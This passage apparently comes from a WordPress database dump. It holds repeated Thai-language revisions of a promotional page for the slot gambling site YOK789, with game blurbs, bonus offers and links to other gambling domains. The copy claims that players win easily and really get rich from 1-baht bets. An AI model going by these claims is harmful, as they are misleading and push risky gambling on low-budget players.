ความต่างอยู่ที่ระบบเกมคัดมาเน้นจังหวะแตกกำลังดี ทำให้สายทุนน้อยก็มีลุ้น ส่วนสายจริงจังก็เร่งรอบไล่ยอดได้เต็มที่ โปรโมชันถูกปล่อยออกมาแบบต่อเนื่อง เพิ่มแรงส่งให้ทุกยอดเดิมพันมีมูลค่ามากขึ้น บรรยากาศการเล่นเลยเต็มไปด้วยพลังและความหวัง ทุกครั้งที่หมุนเหมือนมีโอกาสเปิดทางสู่เงินก้อนใหญ่ ไม่ต้องรอจังหวะฟลุกอย่างเดียวแต่ใช้การวางแผนควบคู่ไปด้วย ใครกำลังมองหาเว็บที่เริ่มเล็กแต่โตได้จริง ที่นี่คือคำตอบที่ชัดเจนในโลกสายปั่นยุคใหม่</p> <h2>เว็บตรง YOK ยกตัวอย่างสล็อตน่าเล่นเริ่มต้นด้วยเงินทุน ปั่น สล็อต 1 บาท</h2> <p>ถ้าอยากเริ่ม <b>ปั่น สล็อต 1 บาท</b> แล้วได้ฟีลคุ้มค่า มีสล็อตหลายแนวที่ออกแบบมาให้เล่นง่ายและลุ้นสนุก เกมธีมสมบัติหรือแนวผจญภัยมักมีรอบโบนัสสุ่มแตกไว เหมาะกับสายค่อย ๆ เก็บกำไร ส่วนแนวผลไม้คลาสสิกให้จังหวะเข้าใจง่าย หมุนเพลินไม่ซับซ้อน ทำให้มือใหม่จับทางได้เร็ว ความดีคือแม้ตั้งเบทต่ำก็ยังมีโอกาสเข้าโหมดพิเศษและฟรีสปินเหมือนเบทสูง ทุกการหมุนจึงไม่เสียเปล่า อยู่ที่การบริหารทุนและเลือกเกมให้ตรงสไตล์ ใครชอบลุ้นรัวหรือชอบค่อย ๆ ไต่ยอดก็เลือกได้ตามจังหวะตัวเอง เปิดประสบการณ์ปั่นแบบเบทเบาแต่ลุ้นหนักได้ครบในที่เดียว</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ปั่น สล็อต ฟรี ทดลอง รวยได้จริง เล่นฟรี YOK789 ได้ทุกค่ายไม่จำกัด </h2> <p>สายอยากลองก่อนลุยจริงต้องถูกใจโหมด <strong>ปั่น สล็อต ฟรี ทดลอง</strong> ที่เปิดให้ทดลองเล่นได้แบบไม่จำกัดค่าย ไม่ต้องเติมก็เข้าไปสัมผัสระบบเกมได้ครบทุกฟีเจอร์ จะลองจับจังหวะแตก ดูรอบโบนัสหรือเทสสไตล์เกมไหนเหมาะกับตัวเองก็ทำได้เต็มที่ ความดีงามคือให้ประสบการณ์เหมือนเล่นเงินจริง ภาพลื่น เอฟเฟกต์ครบ ทำให้วางแผนก่อนลงสนามจริงได้แบบมือโปร ใครอยากฝึกอ่านเกมหรือหาสูตรปั่นที่เข้ามือสามารถใช้โหมดนี้ปั้นความมั่นใจได้สบาย เมื่อพร้อมค่อยสลับมาเล่นจริงก็เดินเกมได้เฉียบกว่าเดิม เป็นพื้นที่ให้ทั้งมือใหม่และสายเก๋าได้พัฒนาจังหวะตัวเองโดยไม่ต้องเสี่ยงทุนตั้งแต่รอบแรก เปิดทางสู่โอกาสรวยด้วยการเริ่มจากศูนย์แบบมีชั้นเชิง</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2026-02-24 07:47:39','2026-02-24 07:47:39','',44,'https://yok789ss.com/?p=333',0,'revision','',0),(334,3,'2026-02-24 07:47:39','2026-02-24 07:47:39','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789.webp\" alt=\"YOK789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789.webp\" alt=\"Yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>YOK789 เว็บสล็อตมาแรง เล่นแตกง่าย เบทขั้นต่ำ 1 บาท รวยได้จริง</h1> <p><a href=\"https://amb18b.com/\"><b>YOK789</b></a> คือจังหวะใหม่ของสายปั่นที่อยากเปลี่ยนเวลาว่างให้กลายเป็นเงินแบบไม่ต้องคิดเยอะ เว็บสล็อตมาแรงที่กระแสกำลังพุ่งแบบหยุดไม่อยู่ จุดเด่นอยู่ที่เบทขั้นต่ำ 1 บาท เปิดทางให้มือใหม่ลองของได้สบาย ส่วนสายโปรก็ไล่ล่ากำไรได้เต็มสปีด เกมแตกง่ายภาพสวยลื่นไหลระบบเสถียรไม่สะดุด เติมถอนเร็วทันใจทำให้ทุกวินาทีมีค่า บรรยากาศในเว็บคือความคึกคักผสมความมั่นใจว่าเล่นแล้วมีลุ้นจริง ไม่ต้องทุนหนาก็มีสิทธิ์ปั้นยอดให้โตได้ทุกวัน ใครกำลังมองหาพื้นที่ทำเงินแบบสนุกและท้าทาย ที่นี่คือสนามที่ตอบโจทย์ทั้งความมันและโอกาสรวยในที่เดียว</p> <h2>ความน่าสนใจของการสมัคร YOK789 เว็บสล็อต เล่นแตกง่าย </h2> <p>ความปังของที่นี่ไม่ได้มีแค่เกมแตกง่ายแต่เริ่มตั้งแต่ขั้นตอนสมัครที่โคตรไว กรอกข้อมูลไม่กี่ขั้นก็พร้อมลุย ไม่มีความยุ่งยากให้เสียอารมณ์ รองรับทั้งมือถือและคอม เล่นได้ทุกที่ทุกเวลา ระบบความปลอดภัยแน่นหนา ทำให้มั่นใจได้ว่าข้อมูลและธุรกรรมถูกดูแลอย่างดี ที่สำคัญคือมีทีมดูแลตลอดเวลา คอยซัพพอร์ตเมื่อมีคำถามหรือปัญหาเกิดขึ้น <a href=\"https://luca333auto.com/\"><b>เข้าสู่ระบบ</b></a> ที่นี่จุดแข็งอีกอย่างคือการอัปเดตเกมใหม่สม่ำเสมอ ทำให้ไม่รู้สึกจำเจ เล่นเมื่อไรก็มีอะไรสดใหม่ให้ลอง ใครอยากเปิดประสบการณ์สล็อตแบบมันจัดเต็มและมีโอกาสทำกำไรจริง การสมัครที่นี่คือก้าวแรกสู่เส้นทางสายปั่นที่ไม่ธรรมดา</p><ul><li><b>YOK789 </b><b>แจกโปรโมชันจัดเต็ม </b></li></ul><p><b>ถ้าพูดถึงความคุ้มที่จับต้องได้ เว็บเราคือสายเปย์ตัวจริง โปรโมชันมาแบบจัดหนักจัดเต็มไม่มีกั๊ก ทั้งโบนัสสมาชิกใหม่ โปรฝากรายวัน และกิจกรรมลุ้นรางวัลที่สลับหมุนเวียนให้ร่วมสนุกตลอด ทำให้ทุกการเติมเงินมีพลังมากกว่าปกติ ความพีคอยู่ที่เงื่อนไขเข้าใจง่าย ไม่ซับซ้อน รับสิทธิ์ไวไม่ต้องรอนาน แค่กดรับก็พร้อมลุยต่อได้ทันที บรรยากาศในเว็บเลยเต็มไปด้วยความตื่นเต้นเหมือนมีบูสต์เพิ่มทุกครั้งที่หมุน เกมสล็อตแต่ละรอบมีความหวังมากขึ้นเพราะมีโปรช่วยดัน ใครชอบฟีลเล่นแล้วได้กำไรเพิ่มแบบเนียน ๆ ที่นี่ตอบโจทย์แบบสุดทาง ทำให้การปั่นทุกครั้งไม่ใช่แค่สนุกแต่ยังรู้สึกว่าคุ้มค่าแบบเห็นชัดทุกยอด</b></p><ul><li><b>ใช้ทุนน้อยก็เล่นได้ </b></li></ul><p><b>สายงบน้อยไม่ต้องถอยเปิดโหมดให้เริ่มต้นง่ายด้วยเบทสบายกระเป๋า แค่มีทุนหลักสิบก็เข้ามาสัมผัสความมันได้ทันที ไม่ต้องรอเงินก้อนใหญ่ก็มีสิทธิ์ลุ้นรางวัล ระบบเกมถูกออกแบบให้มือใหม่จับทางได้ไว เล่นเพลินไม่กดดัน ทำให้การบริหารทุนเป็นเรื่องง่าย ใครอยากค่อย ๆ ปั้นกำไรแบบไม่เสี่ยงหนักก็วางแผนได้ตามสไตล์ ความเฟี้ยวคือแม้ใช้ทุนไม่มากก็ยังได้ฟีลเดียวกับสายทุนสูง ทุกการหมุนมีโอกาสแตกจริงแบบไม่แบ่งชนชั้น เป็นพื้นที่ที่ให้ทุกคนเริ่มต้นได้เท่ากัน แล้วค่อยต่อยอดกำไรให้โตขึ้นตามจังหวะของตัวเอง</b></p><ul><li><b>เกมหลากหลาย ค่ายดังครบ </b></li></ul><p>ความสนุกของเว็บคือการรวมเกมหลากหลายแนวไว้ในที่เดียว ทั้งสล็อตธีมแฟนตาซี ผจญภัย วัฒนธรรม และสไตล์คลาสสิกให้เลือกปั่นไม่ซ้ำอารมณ์ ค่ายเกมชั้นนำถูกคัดมาแบบเน้นคุณภาพ ภาพกราฟิกคมชัด เอฟเฟกต์จัดเต็ม เล่นแล้วลื่นไหลไม่มีสะดุด ทำให้ทุกครั้งที่เข้าเว็บเหมือนได้เปิดโลกใหม่ของความบันเทิง จะสายชอบโบนัสกระจายหรือสายลุ้นแจ็กพอตก็มีตัวเลือกตอบโจทย์ครบ ความดีงามคือมีการอัปเดตเกมใหม่เข้ามาเรื่อย ๆ ไม่ปล่อยให้ความสนุกดรอป ใครเบื่ออะไรเดิม ๆ ก็สลับแนวได้ทันที เป็นคลังเกมที่ทำให้การปั่นแต่ละวันไม่น่าเบื่อและเต็มไปด้วยสีสันตลอดเวลา</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>บอกต่อทางเข้าการทำเงิน ทางเข้า YOK เว็บแจกโบนัส ปัน โปร สล็อต</h2> <p>ใครกำลังส่องช่องทางทำเงินแบบไม่ต้องรอจังหวะชีวิต ต้องลองเข้ามาเช็กอินกับเรา เพราะที่นี่ขึ้นชื่อเรื่องแจกโบนัสแบบจัดเต็ม โปรสล็อตมาแบบไม่กั๊ก ทั้งโบนัสต้อนรับ โปรฝากคุ้ม และกิจกรรมลุ้นรางวัลที่อัปเดตตลอด ทำให้ทุกการฝากมีมูลค่าเพิ่มมากกว่าที่คิด ความเฟี้ยวอยู่ตรงที่ระบบคำนวณอัตโนมัติ <strong>ปัน โปร สล็อต</strong> รับโปรง่ายไม่ต้องทักแชตให้เสียเวลา แค่เข้าเล่นก็มีสิทธิ์รับสิทธิพิเศษแบบต่อเนื่อง บอกเลยว่าสายล่ากำไรจะรู้สึกเหมือนได้ตัวช่วยเพิ่มพลังทุกครั้งที่หมุน เกมสล็อตหลากหลายค่ายดังรวมไว้ครบ จัดเต็มทั้งความสนุกและโอกาสทำยอดให้พุ่งแบบไม่ต้องลุ้นเหนื่อย</p> <h2>เว็บสล็อตมาแรง YOK789 เบทขั้นต่ำ 1 บาท แจกโบนัสหลักล้าน</h2> <p>กระแสความแรงของเว็บไม่ได้มาเล่น ๆ เพราะนี่คือเว็บสล็อตที่เปิดประตูให้ทุกคนเริ่มต้นด้วยเบทขั้นต่ำ 1 บาท แต่ศักยภาพการทำกำไรพุ่งได้ไกลระดับโบนัสหลักล้าน ความต่างอยู่ที่ระบบเกมคัดมาเน้นจังหวะแตกกำลังดี ทำให้สายทุนน้อยก็มีลุ้น ส่วนสายจริงจังก็เร่งรอบไล่ยอดได้เต็มที่ โปรโมชันถูกปล่อยออกมาแบบต่อเนื่อง เพิ่มแรงส่งให้ทุกยอดเดิมพันมีมูลค่ามากขึ้น บรรยากาศการเล่นเลยเต็มไปด้วยพลังและความหวัง ทุกครั้งที่หมุนเหมือนมีโอกาสเปิดทางสู่เงินก้อนใหญ่ ไม่ต้องรอจังหวะฟลุกอย่างเดียวแต่ใช้การวางแผนควบคู่ไปด้วย ใครกำลังมองหาเว็บที่เริ่มเล็กแต่โตได้จริง ที่นี่คือคำตอบที่ชัดเจนในโลกสายปั่นยุคใหม่</p> <h2>เว็บตรง YOK ยกตัวอย่างสล็อตน่าเล่นเริ่มต้นด้วยเงินทุน ปั่น สล็อต 1 บาท</h2> <p>ถ้าอยากเริ่ม <b>ปั่น สล็อต 1 บาท</b> แล้วได้ฟีลคุ้มค่า มีสล็อตหลายแนวที่ออกแบบมาให้เล่นง่ายและลุ้นสนุก เกมธีมสมบัติหรือแนวผจญภัยมักมีรอบโบนัสสุ่มแตกไว เหมาะกับสายค่อย ๆ เก็บกำไร ส่วนแนวผลไม้คลาสสิกให้จังหวะเข้าใจง่าย หมุนเพลินไม่ซับซ้อน ทำให้มือใหม่จับทางได้เร็ว ความดีคือแม้ตั้งเบทต่ำก็ยังมีโอกาสเข้าโหมดพิเศษและฟรีสปินเหมือนเบทสูง ทุกการหมุนจึงไม่เสียเปล่า อยู่ที่การบริหารทุนและเลือกเกมให้ตรงสไตล์ ใครชอบลุ้นรัวหรือชอบค่อย ๆ ไต่ยอดก็เลือกได้ตามจังหวะตัวเอง เปิดประสบการณ์ปั่นแบบเบทเบาแต่ลุ้นหนักได้ครบในที่เดียว</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ปั่น สล็อต ฟรี ทดลอง รวยได้จริง เล่นฟรี YOK789 ได้ทุกค่ายไม่จำกัด </h2> <p>สายอยากลองก่อนลุยจริงต้องถูกใจโหมด <strong>ปั่น สล็อต ฟรี ทดลอง</strong> ที่เปิดให้ทดลองเล่นได้แบบไม่จำกัดค่าย ไม่ต้องเติมก็เข้าไปสัมผัสระบบเกมได้ครบทุกฟีเจอร์ จะลองจับจังหวะแตก ดูรอบโบนัสหรือเทสสไตล์เกมไหนเหมาะกับตัวเองก็ทำได้เต็มที่ ความดีงามคือให้ประสบการณ์เหมือนเล่นเงินจริง ภาพลื่น เอฟเฟกต์ครบ ทำให้วางแผนก่อนลงสนามจริงได้แบบมือโปร ใครอยากฝึกอ่านเกมหรือหาสูตรปั่นที่เข้ามือสามารถใช้โหมดนี้ปั้นความมั่นใจได้สบาย เมื่อพร้อมค่อยสลับมาเล่นจริงก็เดินเกมได้เฉียบกว่าเดิม เป็นพื้นที่ให้ทั้งมือใหม่และสายเก๋าได้พัฒนาจังหวะตัวเองโดยไม่ต้องเสี่ยงทุนตั้งแต่รอบแรก เปิดทางสู่โอกาสรวยด้วยการเริ่มจากศูนย์แบบมีชั้นเชิง</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2026-02-24 07:47:39','2026-02-24 07:47:39','',44,'https://yok789ss.com/?p=334',0,'revision','',0),(335,3,'2026-02-24 07:47:39','2026-02-24 07:47:39','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789.webp\" alt=\"YOK789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789.webp\" alt=\"Yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>YOK789 เว็บสล็อตมาแรง เล่นแตกง่าย เบทขั้นต่ำ 1 บาท รวยได้จริง</h1> <p><a href=\"https://amb18b.com/\"><b>YOK789</b></a> คือจังหวะใหม่ของสายปั่นที่อยากเปลี่ยนเวลาว่างให้กลายเป็นเงินแบบไม่ต้องคิดเยอะ เว็บสล็อตมาแรงที่กระแสกำลังพุ่งแบบหยุดไม่อยู่ จุดเด่นอยู่ที่เบทขั้นต่ำ 1 บาท เปิดทางให้มือใหม่ลองของได้สบาย ส่วนสายโปรก็ไล่ล่ากำไรได้เต็มสปีด เกมแตกง่ายภาพสวยลื่นไหลระบบเสถียรไม่สะดุด เติมถอนเร็วทันใจทำให้ทุกวินาทีมีค่า บรรยากาศในเว็บคือความคึกคักผสมความมั่นใจว่าเล่นแล้วมีลุ้นจริง ไม่ต้องทุนหนาก็มีสิทธิ์ปั้นยอดให้โตได้ทุกวัน ใครกำลังมองหาพื้นที่ทำเงินแบบสนุกและท้าทาย ที่นี่คือสนามที่ตอบโจทย์ทั้งความมันและโอกาสรวยในที่เดียว</p> <h2>ความน่าสนใจของการสมัคร YOK789 เว็บสล็อต เล่นแตกง่าย </h2> <p>ความปังของที่นี่ไม่ได้มีแค่เกมแตกง่ายแต่เริ่มตั้งแต่ขั้นตอนสมัครที่โคตรไว กรอกข้อมูลไม่กี่ขั้นก็พร้อมลุย ไม่มีความยุ่งยากให้เสียอารมณ์ รองรับทั้งมือถือและคอม เล่นได้ทุกที่ทุกเวลา ระบบความปลอดภัยแน่นหนา ทำให้มั่นใจได้ว่าข้อมูลและธุรกรรมถูกดูแลอย่างดี ที่สำคัญคือมีทีมดูแลตลอดเวลา คอยซัพพอร์ตเมื่อมีคำถามหรือปัญหาเกิดขึ้น <a href=\"https://luca333auto.com/\"><b>เข้าสู่ระบบ</b></a> ที่นี่จุดแข็งอีกอย่างคือการอัปเดตเกมใหม่สม่ำเสมอ ทำให้ไม่รู้สึกจำเจ เล่นเมื่อไรก็มีอะไรสดใหม่ให้ลอง ใครอยากเปิดประสบการณ์สล็อตแบบมันจัดเต็มและมีโอกาสทำกำไรจริง การสมัครที่นี่คือก้าวแรกสู่เส้นทางสายปั่นที่ไม่ธรรมดา</p><ul><li><h3><b>YOK789 </b><b>แจกโปรโมชันจัดเต็ม </b></h3></li></ul><p><b>ถ้าพูดถึงความคุ้มที่จับต้องได้ เว็บเราคือสายเปย์ตัวจริง โปรโมชันมาแบบจัดหนักจัดเต็มไม่มีกั๊ก ทั้งโบนัสสมาชิกใหม่ โปรฝากรายวัน และกิจกรรมลุ้นรางวัลที่สลับหมุนเวียนให้ร่วมสนุกตลอด ทำให้ทุกการเติมเงินมีพลังมากกว่าปกติ ความพีคอยู่ที่เงื่อนไขเข้าใจง่าย ไม่ซับซ้อน รับสิทธิ์ไวไม่ต้องรอนาน แค่กดรับก็พร้อมลุยต่อได้ทันที บรรยากาศในเว็บเลยเต็มไปด้วยความตื่นเต้นเหมือนมีบูสต์เพิ่มทุกครั้งที่หมุน เกมสล็อตแต่ละรอบมีความหวังมากขึ้นเพราะมีโปรช่วยดัน ใครชอบฟีลเล่นแล้วได้กำไรเพิ่มแบบเนียน ๆ ที่นี่ตอบโจทย์แบบสุดทาง ทำให้การปั่นทุกครั้งไม่ใช่แค่สนุกแต่ยังรู้สึกว่าคุ้มค่าแบบเห็นชัดทุกยอด</b></p><ul><li><h3><b>ใช้ทุนน้อยก็เล่นได้ </b></h3></li></ul><p><b>สายงบน้อยไม่ต้องถอยเปิดโหมดให้เริ่มต้นง่ายด้วยเบทสบายกระเป๋า แค่มีทุนหลักสิบก็เข้ามาสัมผัสความมันได้ทันที ไม่ต้องรอเงินก้อนใหญ่ก็มีสิทธิ์ลุ้นรางวัล ระบบเกมถูกออกแบบให้มือใหม่จับทางได้ไว เล่นเพลินไม่กดดัน ทำให้การบริหารทุนเป็นเรื่องง่าย ใครอยากค่อย ๆ ปั้นกำไรแบบไม่เสี่ยงหนักก็วางแผนได้ตามสไตล์ ความเฟี้ยวคือแม้ใช้ทุนไม่มากก็ยังได้ฟีลเดียวกับสายทุนสูง ทุกการหมุนมีโอกาสแตกจริงแบบไม่แบ่งชนชั้น เป็นพื้นที่ที่ให้ทุกคนเริ่มต้นได้เท่ากัน แล้วค่อยต่อยอดกำไรให้โตขึ้นตามจังหวะของตัวเอง</b></p><ul><li><h3><b>เกมหลากหลาย ค่ายดังครบ </b></h3></li></ul><p>ความสนุกของเว็บคือการรวมเกมหลากหลายแนวไว้ในที่เดียว ทั้งสล็อตธีมแฟนตาซี ผจญภัย วัฒนธรรม และสไตล์คลาสสิกให้เลือกปั่นไม่ซ้ำอารมณ์ ค่ายเกมชั้นนำถูกคัดมาแบบเน้นคุณภาพ ภาพกราฟิกคมชัด เอฟเฟกต์จัดเต็ม เล่นแล้วลื่นไหลไม่มีสะดุด ทำให้ทุกครั้งที่เข้าเว็บเหมือนได้เปิดโลกใหม่ของความบันเทิง จะสายชอบโบนัสกระจายหรือสายลุ้นแจ็กพอตก็มีตัวเลือกตอบโจทย์ครบ ความดีงามคือมีการอัปเดตเกมใหม่เข้ามาเรื่อย ๆ ไม่ปล่อยให้ความสนุกดรอป ใครเบื่ออะไรเดิม ๆ ก็สลับแนวได้ทันที เป็นคลังเกมที่ทำให้การปั่นแต่ละวันไม่น่าเบื่อและเต็มไปด้วยสีสันตลอดเวลา</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>บอกต่อทางเข้าการทำเงิน ทางเข้า YOK เว็บแจกโบนัส ปัน โปร สล็อต</h2> 